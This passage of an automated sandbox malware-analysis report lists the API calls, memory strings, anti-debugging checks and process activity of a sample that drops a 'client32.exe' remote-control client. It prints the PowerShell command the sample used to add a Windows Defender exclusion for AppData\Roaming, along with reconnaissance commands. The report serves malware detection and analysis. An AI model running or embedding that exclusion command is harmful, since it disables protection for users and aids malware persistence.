m_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6CBDDF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6CBDDA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6CBDD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC06C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,6_2_6CC06C74
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: BUenB12U2a.exe, 00000000.00000003.1719990699.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: VMware
                                Source: client32.exe, 00000006.00000002.3574538256.000000000138D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2099393814.000000000138D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                                Source: client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: client32.exe, 00000006.00000002.3574007074.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3574538256.000000000138D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2099393814.000000000138D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: BUenB12U2a.exe, 00000001.00000003.2027919683.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012396831.0000020E47315000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019096673.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1750148610.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748207345.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2023177526.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000009.00000003.1880304572.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA2A684
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC06C74 VirtualProtect ?,-00000001,00000104,?6_2_6CC06C74
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA334F0 GetProcessHeap,0_2_00007FF76CA334F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA2A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF76CA1C910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA1D19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1D37C SetUnhandledExceptionFilter,0_2_00007FF76CA1D37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76CA2A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF76CA1C910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76CA1D19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1D37C SetUnhandledExceptionFilter,1_2_00007FF76CA1D37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA92A7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFAA92A7C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA93034 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAA93034
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2126 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB0B2126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7FB20C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB7FB20C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B5E25 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9B5E25
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9AFF11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C9AFF11
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC0ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,6_2_6CC0ADFC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB90807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6CB90807
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC0C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6CC0C16F
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCCAFF0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_6CCCAFF0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC6E9C0 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_6CC6E9C0

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C999500 LogonUserA,ImpersonateLoggedOnUser,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,GetLastError,GetDesktopWindow,SetLastError,SetLastError,SetLastError,GetLastError,GetProcAddress,SetLastError,LoadLibraryA,GetProcAddress,GetDesktopWindow,FreeLibrary,wsprintfA,RevertToSelf,CloseHandle,6_2_6C999500
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC66790 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,6_2_6CC66790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD5490 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_6CCD5490
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD5C10 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_6CCD5C10
                                Source: client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: lProgman|
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: Shell_TrayWnd
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exeBinary or memory string: Progman
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: Shell_TrayWndTraceRunpluginTimeoutP$
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman|
                                Source: client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: lProgman
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA395E0 cpuid 0_2_00007FF76CA395E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFDFB773440
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,1_2_00007FFDFB7873A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B14A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,6_2_1070E5F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_1070B6DC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,MultiByteToWideChar,6_2_1070E6AE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,6_2_1070AF75
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,6_2_1070E704
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B3D5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,6_2_1070E7C7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C9BF80C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C9BF848
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C9BF48D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C9BF4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C9BF6B9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_6C9BF781
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C9BF7A5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C9CB1AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C9CB286
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_6C9CB2C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6C9BF2F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6C9BF3E6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,6_2_6CB9888A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,6_2_6CB98468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,6_2_6CB985AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,6_2_6CB965F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,6_2_6CB986FD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,6_2_6CB9871C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6CC0F42E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6CC0F0DB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,6_2_6CC0F034
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,6_2_6CC0F136
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6CC0F3C7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,6_2_6CC0F307
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6CD9F4F6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_6CD96D4E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6CD9EFCB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\ucrtbase.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
